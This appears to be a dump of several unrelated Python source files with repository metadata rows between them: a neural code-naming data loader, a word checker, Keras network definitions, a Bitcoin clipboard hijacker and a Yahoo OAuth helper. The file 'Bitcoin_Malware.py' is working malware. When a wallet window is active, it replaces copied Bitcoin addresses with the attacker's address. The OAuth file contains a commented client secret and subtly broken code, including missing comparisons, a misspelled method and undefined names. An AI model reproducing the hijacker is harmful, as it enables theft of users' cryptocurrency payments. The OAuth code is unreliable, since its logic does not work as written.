name_contexts.append([self.name_dictionary.get_id_or_unk(t) for t in context])
for code_token in set(code[i]):
token_id = self.all_tokens_dictionary.get_id_or_none(code_token)
if token_id is not None:
id_xs.append(k)
id_ys.append(token_id)
k += 1
code_features = sp.csr_matrix((np.ones(len(id_xs)), (id_xs, id_ys)), shape=(k, len(self.all_tokens_dictionary)), dtype=np.int32)
name_targets = np.array(name_targets, dtype=np.int32)
name_contexts = np.array(name_contexts, dtype=np.int32)
original_names_ids = np.array(original_names_ids, dtype=np.int32)
return name_targets, name_contexts, code_features, original_names_ids
@staticmethod
def keep_identifiers_only(self, code):
filtered_code = []
for tokens in code:
identifier_tokens = []
in_id = False
for t in tokens:
if t == "<id>":
in_id = True
elif t == '</id>':
in_id = False
elif in_id:
identifier_tokens.append(t)
filtered_code.append(identifier_tokens)
return filtered_code
@staticmethod
def remove_identifiers_markers(code):
return filter(lambda t: t != "<id>" and t != "</id>", code)
def get_data_in_convolution_format(self, input_file, name_cx_size, min_code_size):
names, code, original_names = self.__get_file_data(input_file)
return self.get_data_for_convolution(names, code, name_cx_size, min_code_size), original_names
def get_data_in_copy_convolution_format(self, input_file, name_cx_size, min_code_size):
names, code, original_names = self.__get_file_data(input_file)
return self.get_data_for_copy_convolution(names, code, name_cx_size, min_code_size), original_names
def get_data_in_recurrent_convolution_format(self, input_file, min_code_size):
names, code, original_names = self.__get_file_data(input_file)
return self.get_data_for_recurrent_convolution(names, code, min_code_size), original_names
def get_data_in_recurrent_copy_convolution_format(self, input_file, min_code_size):
names, code, original_names = self.__get_file_data(input_file)
return self.get_data_for_recurrent_copy_convolution(names, code, min_code_size), original_names
def get_data_for_convolution(self, names, code, name_cx_size, sentence_padding):
assert len(names) == len(code), (len(names), len(code), code.shape)
name_targets = []
name_contexts = []
original_names_ids = []
code_sentences = []
padding = [self.all_tokens_dictionary.get_id_or_unk(self.NONE)]
for i, name in enumerate(names):
code_sentence = [self.all_tokens_dictionary.get_id_or_unk(t) for t in code[i]]
if sentence_padding % 2 == 0:
code_sentence = padding * (sentence_padding / 2) + code_sentence + padding * (sentence_padding / 2)
else:
code_sentence = padding * (sentence_padding / 2 + 1) + code_sentence + padding * (sentence_padding / 2)
for j in xrange(1, len(name)): # First element should always be predictable (ie sentence start)
name_targets.append(self.all_tokens_dictionary.get_id_or_unk(name[j]))
original_names_ids.append(i)
context = name[:j]
if len(context) < name_cx_size:
context = [self.NONE] * (name_cx_size - len(context)) + context
else:
context = context[-name_cx_size:]
assert len(context) == name_cx_size, (len(context), name_cx_size,)
name_contexts.append([self.name_dictionary.get_id_or_unk(t) for t in context])
code_sentences.append(np.array(code_sentence, dtype=np.int32))
name_targets = np.array(name_targets, dtype=np.int32)
name_contexts = np.array(name_contexts, dtype=np.int32)
code_sentences = np.array(code_sentences, dtype=np.object)
original_names_ids = np.array(original_names_ids, dtype=np.int32)
return name_targets, name_contexts, code_sentences, original_names_ids
def get_data_for_recurrent_convolution(self, names, code, sentence_padding):
assert len(names) == len(code), (len(names), len(code), code.shape)
name_targets = []
code_sentences = []
padding = [self.all_tokens_dictionary.get_id_or_unk(self.NONE)]
for i, name in enumerate(names):
code_sentence = [self.all_tokens_dictionary.get_id_or_unk(t) for t in code[i]]
if sentence_padding % 2 == 0:
code_sentence = padding * (sentence_padding / 2) + code_sentence + padding * (sentence_padding / 2)
else:
code_sentence = padding * (sentence_padding / 2 + 1) + code_sentence + padding * (sentence_padding / 2)
name_tokens = [self.all_tokens_dictionary.get_id_or_unk(t) for t in name]
name_targets.append(np.array(name_tokens, dtype=np.int32))
code_sentences.append(np.array(code_sentence, dtype=np.int32))
name_targets = np.array(name_targets, dtype=np.object)
code_sentences = np.array(code_sentences, dtype=np.object)
return name_targets, code_sentences
def get_data_for_recurrent_copy_convolution(self, names, code, sentence_padding):
assert len(names) == len(code), (len(names), len(code), code.shape)
name_targets = []
target_is_unk = []
copy_vectors = []
code_sentences = []
padding = [self.all_tokens_dictionary.get_id_or_unk(self.NONE)]
for i, name in enumerate(names):
code_sentence = [self.all_tokens_dictionary.get_id_or_unk(t) for t in code[i]]
if sentence_padding % 2 == 0:
code_sentence = padding * (sentence_padding / 2) + code_sentence + padding * (sentence_padding / 2)
else:
code_sentence = padding * (sentence_padding / 2 + 1) + code_sentence + padding * (sentence_padding / 2)
name_tokens = [self.all_tokens_dictionary.get_id_or_unk(t) for t in name]
unk_tokens = [self.all_tokens_dictionary.is_unk(t) for t in name]
target_can_be_copied = [[t == subtok for t in code[i]] for subtok in name]
name_targets.append(np.array(name_tokens, dtype=np.int32))
target_is_unk.append(np.array(unk_tokens, dtype=np.int32))
copy_vectors.append(np.array(target_can_be_copied, dtype=np.int32))
code_sentences.append(np.array(code_sentence, dtype=np.int32))
name_targets = np.array(name_targets, dtype=np.object)
code_sentences = np.array(code_sentences, dtype=np.object)
code = np.array(code, dtype=np.object)
target_is_unk = np.array(target_is_unk, dtype=np.object)
copy_vectors = np.array(copy_vectors, dtype=np.object)
return name_targets, code_sentences, code, target_is_unk, copy_vectors
@staticmethod
def get_data_in_recurrent_convolution_format_with_validation(input_file, pct_train, min_code_size):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
lim = int(pct_train * len(names))
idxs = np.arange(len(names))
np.random.shuffle(idxs)
naming = TokenCodeNamingData(names[idxs[:lim]], code[idxs[:lim]])
return naming.get_data_for_recurrent_convolution(names[idxs[:lim]], code[idxs[:lim]], min_code_size),\
naming.get_data_for_recurrent_convolution(names[idxs[lim:]], code[idxs[lim:]], min_code_size), naming
@staticmethod
def get_data_in_recurrent_copy_convolution_format_with_validation(input_file, pct_train, min_code_size):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
lim = int(pct_train * len(names))
idxs = np.arange(len(names))
np.random.shuffle(idxs)
naming = TokenCodeNamingData(names[idxs[:lim]], code[idxs[:lim]])
return naming.get_data_for_recurrent_copy_convolution(names[idxs[:lim]], code[idxs[:lim]], min_code_size),\
naming.get_data_for_recurrent_copy_convolution(names[idxs[lim:]], code[idxs[lim:]], min_code_size), naming
@staticmethod
def get_data_in_convolution_format_with_validation(input_file, names_cx_size, pct_train, min_code_size):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
lim = int(pct_train * len(names))
idxs = np.arange(len(names))
np.random.shuffle(idxs)
naming = TokenCodeNamingData(names[idxs[:lim]], code[idxs[:lim]])
return naming.get_data_for_convolution(names[idxs[:lim]], code[idxs[:lim]], names_cx_size, min_code_size),\
naming.get_data_for_convolution(names[idxs[lim:]], code[idxs[lim:]], names_cx_size, min_code_size), naming
@staticmethod
def get_data_in_copy_convolution_format_with_validation(input_file, names_cx_size, pct_train, min_code_size):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
lim = int(pct_train * len(names))
idxs = np.arange(len(names))
np.random.shuffle(idxs)
naming = TokenCodeNamingData(names[idxs[:lim]], code[idxs[:lim]])
return naming.get_data_for_copy_convolution(names[idxs[:lim]], code[idxs[:lim]], names_cx_size, min_code_size),\
naming.get_data_for_copy_convolution(names[idxs[lim:]], code[idxs[lim:]], names_cx_size, min_code_size), naming
def get_data_for_copy_convolution(self, names, code, name_cx_size, sentence_padding):
assert len(names) == len(code), (len(names), len(code), code.shape)
name_targets = []
original_targets = []
name_contexts = []
original_names_ids = []
code_sentences = []
original_code = []
copy_vector = []
target_is_unk = []
padding = [self.all_tokens_dictionary.get_id_or_unk(self.NONE)]
for i, name in enumerate(names):
code_sentence = [self.all_tokens_dictionary.get_id_or_unk(t) for t in code[i]]
if sentence_padding % 2 == 0:
code_sentence = padding * (sentence_padding / 2) + code_sentence + padding * (sentence_padding / 2)
else:
code_sentence = padding * (sentence_padding / 2 + 1) + code_sentence + padding * (sentence_padding / 2)
for j in xrange(1, len(name)):  # Skip the first element: it is always the sentence-start token
name_targets.append(self.all_tokens_dictionary.get_id_or_unk(name[j]))
original_targets.append(name[j])
target_is_unk.append(self.all_tokens_dictionary.is_unk(name[j]))
original_names_ids.append(i)
context = name[:j]
if len(context) < name_cx_size:
context = [self.NONE] * (name_cx_size - len(context)) + context
else:
context = context[-name_cx_size:]
assert len(context) == name_cx_size, (len(context), name_cx_size,)
name_contexts.append([self.name_dictionary.get_id_or_unk(t) for t in context])
code_sentences.append(np.array(code_sentence, dtype=np.int32))
original_code.append(code[i])
tokens_to_be_copied = [t == name[j] for t in code[i]]
copy_vector.append(np.array(tokens_to_be_copied, dtype=np.int32))
name_targets = np.array(name_targets, dtype=np.int32)
name_contexts = np.array(name_contexts, dtype=np.int32)
code_sentences = np.array(code_sentences, dtype=np.object)
original_names_ids = np.array(original_names_ids, dtype=np.int32)
copy_vector = np.array(copy_vector, dtype=np.object)
target_is_unk = np.array(target_is_unk, dtype=np.int32)
return name_targets, original_targets, name_contexts, code_sentences, original_code, copy_vector, target_is_unk, original_names_ids
def get_suggestions_given_name_prefix(self, next_name_log_probs, name_cx_size, max_predicted_identifier_size=5, max_steps=100):
suggestions = defaultdict(lambda: float('-inf'))  # Maps each completed suggestion (a tuple of subtokens) to its log-probability
# A stack of partial suggestions in the form (context_window, [subword1, subword2, ...], logprob)
possible_suggestions_stack = [
([self.NONE] * (name_cx_size - 1) + [self.SUBTOKEN_START], [], 0)]
# Keep the best max_size_to_keep suggestion scores (sorted in the heap) and prune further exploration
# of any candidate that already scores lower
predictions_probs_heap = [float('-inf')]
max_size_to_keep = 15
nsteps = 0
while True:
scored_list = []
while len(possible_suggestions_stack) > 0:
subword_tokens = possible_suggestions_stack.pop()
# If we're done, append to full suggestions
if subword_tokens[0][-1] == self.SUBTOKEN_END:
final_prediction = tuple(subword_tokens[1][:-1])
if len(final_prediction) == 0:
continue
log_prob_of_suggestion = np.logaddexp(suggestions[final_prediction], subword_tokens[2])
if log_prob_of_suggestion > predictions_probs_heap[0] and log_prob_of_suggestion != float('-inf'):
# Push only if the score is better than the current minimum and finite, then remove extraneous entries
suggestions[final_prediction] = log_prob_of_suggestion
heapq.heappush(predictions_probs_heap, log_prob_of_suggestion)
if len(predictions_probs_heap) > max_size_to_keep:
heapq.heappop(predictions_probs_heap)
continue
elif len(subword_tokens[1]) > max_predicted_identifier_size: # Stop recursion here
continue
# Convert subword context
context = [self.name_dictionary.get_id_or_unk(k) for k in
subword_tokens[0][-name_cx_size:]]
assert len(context) == name_cx_size
context = np.array([context], dtype=np.int32)
# Predict next subwords
target_subword_logprobs = next_name_log_probs(context)
def get_possible_options(name_id):
# TODO: Handle UNK differently?
subword_name = self.all_tokens_dictionary.get_name_for_id(name_id)
if subword_name == self.all_tokens_dictionary.get_unk():
subword_name = "***"
name = subword_tokens[1] + [subword_name]
return subword_tokens[0][1:] + [subword_name], name, target_subword_logprobs[0, name_id] + \
subword_tokens[2]
top_indices = np.argsort(-target_subword_logprobs[0])
possible_options = [get_possible_options(top_indices[i]) for i in xrange(max_size_to_keep)]
# Disallow suggestions that contain consecutive duplicate subtokens.
scored_list.extend(filter(lambda x: len(x[1])==1 or x[1][-1] != x[1][-2], possible_options))
# Prune
scored_list = filter(lambda suggestion: suggestion[2] >= predictions_probs_heap[0] and suggestion[2] > float('-inf'), scored_list)
scored_list.sort(key=lambda entry: entry[2], reverse=True)
# Update
possible_suggestions_stack = scored_list[:max_size_to_keep]
nsteps += 1
if nsteps >= max_steps:
break
# Sort and append to predictions
suggestions = [(identifier, np.exp(logprob)) for identifier, logprob in suggestions.items()]
suggestions.sort(key=lambda entry: entry[1], reverse=True)
# print suggestions
return suggestions
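# --- Hedged illustration of the pruning pattern above (not original code) ---
# A bounded min-heap keeps only the best `max_size_to_keep` scores; any
# candidate scoring below heap[0] can be pruned. The pattern in isolation:
@staticmethod
def _keep_top_k_example(scores, k):
    heap = [float('-inf')]
    for s in scores:
        if s > heap[0]:
            heapq.heappush(heap, s)
            if len(heap) > k:
                heapq.heappop(heap)
    return sorted(heap, reverse=True)
# _keep_top_k_example([0.1, 0.5, 0.3, 0.9], 2) == [0.9, 0.5]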
| 51.953744
| 143
| 0.644338
| 3,038
| 23,587
| 4.682357
| 0.087558
| 0.022777
| 0.020387
| 0.035571
| 0.68471
| 0.651107
| 0.624394
| 0.603866
| 0.578278
| 0.554517
| 0
| 0.008087
| 0.255607
| 23,587
| 453
| 144
| 52.068433
| 0.802085
| 0.061347
| 0
| 0.497222
| 0
| 0
| 0.003678
| 0
| 0
| 0
| 0
| 0.002208
| 0.061111
| 1
| 0.069444
| false
| 0
| 0.019444
| 0.002778
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a82c44a1683f511d5f99fbda3a6f12bd84f86c4c
| 550
|
py
|
Python
|
test_word.py
|
AsherSeiling/Ap-hug-Vocab-database
|
fbf29a225e81a5807b6ff4e06fbb24e88ce55a6a
|
[
"MIT"
] | null | null | null |
test_word.py
|
AsherSeiling/Ap-hug-Vocab-database
|
fbf29a225e81a5807b6ff4e06fbb24e88ce55a6a
|
[
"MIT"
] | 1
|
2021-02-27T06:12:07.000Z
|
2021-03-01T14:32:39.000Z
|
test_word.py
|
AsherSeiling/Ap-hug-Vocab-database
|
fbf29a225e81a5807b6ff4e06fbb24e88ce55a6a
|
[
"MIT"
] | 1
|
2021-02-27T06:14:55.000Z
|
2021-02-27T06:14:55.000Z
|
words = open("words.txt", "r")
words = [x.rstrip("\n") for x in words.readlines()]
refwords = open("referencewords.txt", "r")
refwords = [x.strip("\n") for x in refwords.readlines()]
def find_word(word):
    return word.lower() in words
words_needed = []
def main():
for items in refwords:
buffer = ""
for i in items:
if i != " ":
buffer += i
testword = find_word(buffer.lower())
if not testword:
words_needed.append(items.lower())
main()
for i in words_needed:
print(i)
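# --- Hedged note (illustration, not part of the original script) ---
# Membership tests against a list are O(n) per lookup; converting the word
# list to a set makes each lookup O(1). A minimal equivalent sketch:
word_set = set(w.lower() for w in words)
def find_word_fast(word):
    return word.lower() in word_set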
| 20.37037
| 56
| 0.650909
| 81
| 550
| 4.358025
| 0.37037
| 0.05949
| 0.028329
| 0.03966
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.187273
| 550
| 27
| 57
| 20.37037
| 0.789709
| 0
| 0
| 0
| 0
| 0
| 0.061706
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0
| 0
| 0.136364
| 0.045455
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a82ef552d3bf70dc77e897c13a1b0f9b584ffa9d
| 3,359
|
py
|
Python
|
src/keras_networks.py
|
RU-IIPL/2DLD_keras
|
8c291b6a652f54bd94cb3a5c8382d10ba42e5cbf
|
[
"MIT"
] | 1
|
2021-05-24T08:00:29.000Z
|
2021-05-24T08:00:29.000Z
|
src/keras_networks.py
|
RU-IIPL/2DLD_keras
|
8c291b6a652f54bd94cb3a5c8382d10ba42e5cbf
|
[
"MIT"
] | null | null | null |
src/keras_networks.py
|
RU-IIPL/2DLD_keras
|
8c291b6a652f54bd94cb3a5c8382d10ba42e5cbf
|
[
"MIT"
] | 1
|
2021-09-29T03:43:46.000Z
|
2021-09-29T03:43:46.000Z
|
# -*- coding: utf-8 -*-
"""
@author: Terada
"""
from keras.models import Sequential, Model
from keras.layers import Dense, MaxPooling2D, Flatten, Dropout
from keras.layers import Conv2D, BatchNormalization, ZeroPadding2D, MaxPool2D
from keras.layers import Input, Convolution2D, AveragePooling2D, merge, Reshape, Activation, concatenate
from keras.regularizers import l2
#from keras.engine.topology import Container
def net7(input_size):
model = Sequential()
model.add(Conv2D(32, (3, 3), activation='relu', input_shape=(input_size[0], input_size[1], 1)))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(32, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(1000, activation='relu'))
model.add(Dense(500, activation='relu'))
model.add(Dense(28))
return model
def lenet(input_size):
model = Sequential()
model.add(Conv2D(20, kernel_size=5, strides=1, activation='relu', input_shape=(input_size[0], input_size[1], 1)))
model.add(MaxPooling2D(2, strides=2))
model.add(Conv2D(50, kernel_size=5, strides=1, activation='relu'))
model.add(MaxPooling2D(2, strides=2))
model.add(Flatten())
model.add(Dense(500, activation='relu'))
model.add(Dense(28)) #activation='softmax'
return model
def alexnet(input_size):
model = Sequential()
model.add(Conv2D(48, 11, strides=3, activation='relu', padding='same', input_shape=(input_size[0], input_size[1], 1)))
model.add(MaxPooling2D(3, strides=2))
model.add(BatchNormalization())
model.add(Conv2D(128, 5, strides=3, activation='relu', padding='same'))
model.add(MaxPooling2D(3, strides=2))
model.add(BatchNormalization())
model.add(Conv2D(192, 3, strides=1, activation='relu', padding='same'))
model.add(Conv2D(192, 3, strides=1, activation='relu', padding='same'))
model.add(Conv2D(128, 3, strides=1, activation='relu', padding='same'))
model.add(MaxPooling2D(3, strides=2))
model.add(BatchNormalization())
model.add(Flatten())
model.add(Dense(2048, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(2048, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(28)) #activation='softmax'
return model
def malti_net(input_size):
inputs = Input(shape=(input_size[0], input_size[1], 1))
conv1 = Conv2D(18, (3, 3), activation='relu')(inputs)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(32, (3, 3), activation='relu')(pool1)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(32, (3, 3), activation='relu')(pool2)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(64, (3, 3), activation='relu')(pool3)
pool4 = MaxPooling2D(pool_size=(2, 2))(conv4)
flat1 = Flatten()(pool4)
fc1 = Dense(1000, activation='relu')(flat1)
fc2 = Dense(500, activation='relu')(fc1)
x_main = Dense(28, name='main')(fc2)
x_sub1 = Dense(2, name='sub1', activation='softmax')(fc2)
x_sub2 = Dense(5, name='sub2', activation='softmax')(fc2)
model = Model(inputs=inputs, outputs=[x_main, x_sub1, x_sub2])
return model
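# --- Hedged usage sketch (not part of the original module) ---
# malti_net returns a three-output Model; with the Keras functional API it is
# typically compiled with one loss per named output. The losses and weights
# below are illustrative assumptions, not values from this repository:
if __name__ == '__main__':
    model = malti_net((128, 128))
    model.compile(optimizer='adam',
                  loss={'main': 'mse',
                        'sub1': 'categorical_crossentropy',
                        'sub2': 'categorical_crossentropy'},
                  loss_weights={'main': 1.0, 'sub1': 0.5, 'sub2': 0.5})
    model.summary()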
| 42.518987
| 122
| 0.677583
| 469
| 3,359
| 4.784648
| 0.181237
| 0.128342
| 0.068627
| 0.088235
| 0.665775
| 0.620321
| 0.566845
| 0.487077
| 0.4541
| 0.407754
| 0
| 0.072772
| 0.144984
| 3,359
| 78
| 123
| 43.064103
| 0.708565
| 0.036023
| 0
| 0.514706
| 0
| 0
| 0.041525
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.073529
| 0
| 0.191176
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a830be9674eca4b0486b3f40d92cbb270322784c
| 2,327
|
py
|
Python
|
Bitcoin_Malware.py
|
Ismael-Safadi/Bitcoin-Wallet-address-spoofer
|
16b92d5538d10a2b14ee1fed441a25bdb33a2e67
|
[
"MIT"
] | 7
|
2019-03-04T14:28:53.000Z
|
2022-01-31T12:11:53.000Z
|
Bitcoin_Malware.py
|
Ismael-Safadi/Bitcoin-Wallet-address-spoofer
|
16b92d5538d10a2b14ee1fed441a25bdb33a2e67
|
[
"MIT"
] | null | null | null |
Bitcoin_Malware.py
|
Ismael-Safadi/Bitcoin-Wallet-address-spoofer
|
16b92d5538d10a2b14ee1fed441a25bdb33a2e67
|
[
"MIT"
] | 4
|
2019-03-04T14:29:01.000Z
|
2022-01-31T12:11:40.000Z
|
# Coded By : Ismael Al-safadi
from win32gui import GetWindowText, GetForegroundWindow
from pyperclip import copy
from re import findall
from win32clipboard import OpenClipboard , GetClipboardData , CloseClipboard
from time import sleep
class BitcoinDroper:
"""
class for spoofing Bitcoin Wallet address .
Methods :
check_active_window : for check active window.
check_bitcoin_wallet : This method will check if the copied data right now
is as Bitcoin Wallet address or not.
return_copied_wallet : this function will return the old address .
spoof_wallet : Function for change address to your.
get_old_wallet : Function for getting the old address .
spoofing_done : Function to show if spoofing done or not .
"""
def __init__(self):
# You can add many of bitcoin wallets names into the list
self.list_of_btc = ['blockchain','exodus','coinbase','electrum' , 'bitcoin','bitstamp']
self.destination_address = "Your Bitcoin address wallet"
self.done = False
def check_active_window(self):
window = (GetWindowText(GetForegroundWindow())[0:44])
window = str(window).lower()
if any(ext in window for ext in self.list_of_btc):
return True
else:
return False
def check_bitcoin_wallet(self):
OpenClipboard()
data = GetClipboardData()
CloseClipboard()
l = findall('[a-zA-Z0-9]{34}', data)
if len(l) == 1:
return True
else:
return False
def return_copied_wallet(self):
copy(self.old_wallet)
def spoof_wallet(self):
copy(self.destination_address)
self.done = True
def get_old_wallet(self):
OpenClipboard()
self.old_wallet = GetClipboardData()
CloseClipboard()
def spoofing_done(self):
return self.done
a = BitcoinDroper()
while True:
if a.check_active_window() and a.check_bitcoin_wallet():
if not a.spoofing_done():
a.get_old_wallet()
a.spoof_wallet()
elif a.spoofing_done():
if a.check_bitcoin_wallet() and not a.check_active_window():
a.return_copied_wallet()
sleep(2)
| 31.026667
| 96
| 0.628277
| 277
| 2,327
| 5.108303
| 0.34657
| 0.055124
| 0.060071
| 0.018375
| 0.039576
| 0.039576
| 0
| 0
| 0
| 0
| 0
| 0.007932
| 0.29566
| 2,327
| 74
| 97
| 31.445946
| 0.8554
| 0.243661
| 0
| 0.212766
| 0
| 0
| 0.054434
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.148936
| false
| 0
| 0.106383
| 0.021277
| 0.382979
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a8347276bdea4347d1187329f50e22db158c90b3
| 5,096
|
py
|
Python
|
Stock_Programs/myOauth.py
|
timwroge/DeepPurple
|
3d6f3203938853ede654ef4f88b7451a1ba3999e
|
[
"Apache-2.0"
] | 4
|
2020-02-13T18:57:41.000Z
|
2020-08-03T21:08:26.000Z
|
Stock_Programs/myOauth.py
|
timwroge/DeepPurple
|
3d6f3203938853ede654ef4f88b7451a1ba3999e
|
[
"Apache-2.0"
] | null | null | null |
Stock_Programs/myOauth.py
|
timwroge/DeepPurple
|
3d6f3203938853ede654ef4f88b7451a1ba3999e
|
[
"Apache-2.0"
] | 1
|
2021-06-14T13:42:39.000Z
|
2021-06-14T13:42:39.000Z
|
import urllib.parse, urllib.request,json
import time
import hmac, hashlib,random,base64
#yahoo stuff
#client ID dj0yJmk9S3owYWNNcm1jS3VIJmQ9WVdrOU1HMUZiMHh5TjJNbWNHbzlNQS0tJnM9Y29uc3VtZXJzZWNyZXQmeD0xOQ--
#client secret ID fcde44eb1bf2a7ff474b9fd861a6fcf33be56d3f
def setConsumerCreds(cons_key,cons_secret):
global consumerKey
global consumerSecret
consumerKey = cons_key
consumerSecret = cons_secret
def set_access_token(key,secret):
global accessToken
global accessTokenSecret
accessToken = key
accessTokenSecret = secret
def get_base_string(resourceUrl, values,method="POST"):
baseString = method+"&"+url_encode(resourceUrl) + "&"
sortedKeys = sorted(values.keys())
for i in range(len(sortedKeys)):
baseString += url_encode(sortedKeys[i] + "=") + url_encode(url_encode(values[sortedKeys[i]]))
if i < len(sortedKeys) - 1:
baseString += url_encode("&")
return baseString
def add_oauth_parameters(parameters, addAccessToken = True):
parameters["oauth_consumer_key"] = consumerKey
if (addAccessToken):
parameters["oauth_token"] = accessToken
parameters["oauth_version"] = "1.0"
parameters["oauth_nonce"] = str(get_nonce())
parameters["oauth_timestamp"] = str(get_timestamp())
parameters["oauth_signature_method"]= "HMAC-SHA1"
def get_nonce():
return random.randint(1,999999999)
def get_timestamp():
return int(time.time())
def get_signature(signingKey,stringToHash):
hmacAlg = hmac.HMAC(signingKey,stringToHash,hashlib.sha1)
return base64.b64encode(hmacAlg.digest())
def url_encode(data):
return urllib.parse.quote(data,"")
def build_oauth_headers(parameters):
header = "OAuth "
sortedKeys = sorted(parameters.keys())
for i in range(len(sortedKeys)):
header = header+ url_encode(sortedKeys[i]) + "=\"" + url_encode(parameters[sortedKeys[i]]) + "\""
if i < len(sortedKeys) - 1:
header = header + ","
return header
##### ACTUAL FUNCTIONS
def get_authorization_url(resourceUrl,endpointUrl,callbackUrl):
oauthParameters = {}
add_oauth_parameters(oauthParameters, False)
oauthParameters["oauth_callback"] = callbackUrl
baseString = get_base_string(resourceUrl,oauthParameters)
signingKey = consumerSecret + "&"
oauthParameters["oauth_signature"] = get_signature(signingKey,baseString)
headers = build_oauth_headers(oauthParameters)
httpRequest = urllib.request.Request(resourceUrl)
httpRequest.add_header("Authorization",headers)
try:
httpResponse = urllib.request.urlopen(httpRequest)
except urllib.request.HTTPError as e:
return "Response: %s" % e.read()
responseData = httpResponse.read()
responseParameters = responseData.split("&")
for string in responseParameters:
if string.find("oauth_token_secret") -1: requestTokenSecret = string.split("=")[1]
elif string.find("oauth_token") -1: requestToken = string.split("=")[1]
return endpointUrl+"?oauth_token="+requestToken
def get_access_token(resourceUrl, requestTok, requestTokSecret, oauth_verifier):
global requestToken,requestTokenSecret,accessToken,accessTokenSecret
requestToken = requestTok
requestTokenSecret = requestTokSecret
oauthParmeters = {"oauth_verfier" : oauth_verifier,"oauth_token":requestToken}
add_oauth_paremeters(oauthParameters,False)
baseString = get_base_string(resourceUrl,oauthParameters)
signingKey = consumerSecret + "&" + requestTokenSecret
oauthParameters["oauth_signature"] = get_signature(signingKey,baseString)
header = build_oauth_headers(oauthParameters)
httpRequest = urllib.request.Request(resourceUrl)
httpRequest.add_header("Authorization",header)
httpResponse = urllib.request.urlopen(httpRequest)
responseParameters = httpResponse.read().split("&")
for string in responseParameters:
if string.find("oauth_token_secret")-1:
accessTokenSecret = string.split("=")[1]
elif string.find("oauth_token")-1:
accessToken = string.split("=")[1]
def get_api_response(resourceUrl,method="POST",parameters={}):
add_oauth_parameters(parameters)
baseString = get_base_string(resourceUrl,parameters,method)
signingKey = consumerSecret + "&" + accessTokenSecret
parameters["oauth_signature"] = get_signature(signingKey,baseString)
parameters2 = {}
for string in sorted(parameters.keys()):
if string.finds("oauth_") == 1:
parameters2[s] = parameters.pop(s)
header = build_oauth_headers(parameters)
httpRequest = urllib.request.Request(resourceUrl,urllib.parse.urlencode(parameters2))
httpRequest.add_header("Authorization",header)
httpResponse = urllib.request.urlopen(httpRequest)
respStr = httpResponse.read()
return respStr
def yqlQuery(query):
baseUrl = "https://query.yahooapis.com/v1/public/yql?"
searchUrl = baseUrl + urllib.parse.quote(query)
result= urllib.request.urlopen(searchUrl).read()
data = json.loads(result)
return data["query"]["results"]
| 41.770492
| 116
| 0.724882
| 518
| 5,096
| 6.978764
| 0.247104
| 0.032365
| 0.014385
| 0.026556
| 0.296819
| 0.260858
| 0.232089
| 0.167358
| 0.100692
| 0.080221
| 0
| 0.015684
| 0.161695
| 5,096
| 121
| 117
| 42.115702
| 0.830524
| 0.040424
| 0
| 0.12381
| 0
| 0
| 0.090145
| 0.012088
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12381
| false
| 0
| 0.028571
| 0.028571
| 0.238095
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a8347a798c6edcafbe98def909244e3a366c1264
| 5,246
|
py
|
Python
|
IOController/src/UpdateManager.py
|
MicrosoftDX/liquidintel
|
8c3f840f88ca3515cc812078a620e2a845978177
|
[
"MIT"
] | 9
|
2017-05-27T20:42:46.000Z
|
2020-11-12T21:03:28.000Z
|
IOController/src/UpdateManager.py
|
MicrosoftDX/liquidintel
|
